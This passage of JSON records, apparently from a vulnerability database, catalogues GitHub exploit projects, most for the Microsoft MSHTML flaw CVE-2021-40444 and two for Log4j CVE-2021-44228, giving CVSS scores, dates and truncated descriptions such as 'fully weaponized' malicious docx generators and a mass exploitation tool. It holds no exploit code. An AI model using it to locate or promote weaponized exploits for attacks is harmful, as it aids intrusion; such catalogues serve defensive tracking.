"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-15T00:43:34", "id": "B7D137AD-216F-5D27-9D7B-6F3B5EEB266D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:25", "description": "# CVE-2021-40444 docx Generate\ndocx generating to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T05:31:52", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-10-14T23:45:35", "id": "0990FE6E-7DC3-559E-9B84-E739872B988C", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:34:32", "description": "# Fully Weaponized CVE-2021-40444\n\nMalicious docx generator to e...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-28T06:33:25", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-28T09:38:18", "id": "CCA69DF0-1EB2-5F30-BEC9-04ED43F42EA5", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-05T05:19:33", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-06-05T02:27:21", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-06-05T02:29:52", "id": "1934A15D-9857-5560-B6CA-EA6A2A8A91F8", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-09T21:51:56", "description": "# Microsoft MSHTML Remote Code Execution Vulnerability CVE-2021-...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-08T08:32:40", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-09T21:16:38", "id": "FBB2DA29-1A11-5D78-A28C-1BF3821613AC", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:10:41", "description": "# Docx-Exploit-2021\n\nThis docx exploit uses r...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-29T10:35:55", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-04-11T07:58:23", "id": "B9C2639D-9C07-5F11-B663-C144F457A9F7", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-31T08:47:22", "description": "# Fully Weaponized CVE-2021-40444\n\nMalicious docx generator to e...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-15T22:34:35", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-05-31T01:08:02", "id": "29AB2E6A-3E44-55A2-801D-2971FABB2E5D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:03:37", "description": "# CVE-2021-40444-URL-Extractor\n\nPython script to extract embedde...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-16T16:54:50", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-20T19:01:48", "id": "0E965070-1EAE-59AA-86E6-41ADEFDAED7D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:09", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-22T13:29:20", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-11-22T13:41:39", "id": "DD5D2BF7-BE9D-59EA-8DF2-D85AEC13A4A0", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-26T03:16:25", "description": "# CVE-2021-40444-POC\nAn attempt to reproduce Microsoft MSHTML Re...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-28T14:55:46", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-26T02:46:54", "id": "8B907536-B213-590D-81B9-32CF4A55322E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T02:21:49", "description": "# Microsoft-Office-Word-MSHTML-Remote-Code-Exe...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-19T08:16:07", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-09-16T21:49:48", "id": "AAFEAA7E-81B7-5CE7-9E2F-16828CC5468F", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:48", "description": "# TIC4301_Project\nTIC4301 Project - CVE-2021-40444\n\nDownload the...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-16T07:07:26", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-06T13:36:02", "id": "111C9F44-593D-5E56-8040-615B48ED3E24", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T22:52:51", "description": "# CVE-2021-40444--CABless version\nUpdate: Modified code so that ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-19T19:46:28", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-07-17T22:25:33", "id": "0E388E09-F00E-58B6-BEFE-026913357CE0", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:20", "description": "# CVE-2021-40444\nCVE-2021-40444 POC\n\n-----BEGIN PUBLIC KEY-----\n...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-09T02:30:26", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-17T10:41:29", "id": "37D2BE4F-9D7A-51CD-B802-2FAB35B39A4E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-24T12:46:04", "description": "# CVE-2021-40444 docx Generate\n.docx generate...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T02:49:37", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-24T11:57:05", "id": "88EFCA30-5DED-59FB-A476-A92F53D1497E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T02:36:47", "description": "CVE-2021-40444 builders\n\nThis repo contain builders of cab file,...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-12T18:05:53", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-09-16T21:47:26", "id": "8CD90173-6341-5FAD-942A-A9617561026A", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:39", "description": "\"Fork\" of [lockedbytes](https://github.com/lockedbyte) CVE-2021-...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-14T13:45:36", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-15T14:42:59", "id": "F5CEF191-B04C-5FC5-82D1-3B728EC648A9", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:05", "description": "# \u3016EXP\u3017Ladon CVE-2021-40444 Office\u6f0f\u6d1e\u590d\u73b0\n\n\n### \u6f0f\u6d1e\u6982\u8ff0\n\n\u5317\u4eac\u65f6\u95f49\u67088\u65e5\uff0c\u7eff\u76df\u79d1\u6280...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-14T17:10:48", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-40444"], "modified": "2021-11-15T04:16:33", "id": "FF761088-559C-5E71-A5CD-196D4E4571B8", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-27T23:56:09", "description": "# CVE-2021-44228-Mass-RCE\nCVE-2021-44228 Mass Exploitation tool ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T22:19:29", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-27T20:57:52", "id": "CBEB0168-C1C9-5A9B-8B92-83E1054E44EA", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-06T08:43:51", "description": "# Log4j2 2.14.1 LDAP \uc6d0\uaca9 \ucf54\ub4dc \uc2e4\ud589 \ucde8\uc57d\uc810(CVE-2021-44228) \ud655\uc778\n\n> \ud83c\udf88 Spring...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-03T04:36:41", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-09T19:59:25", "id": "4BD74B8C-D553-57C6-AB15-6B899401AAA4", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, 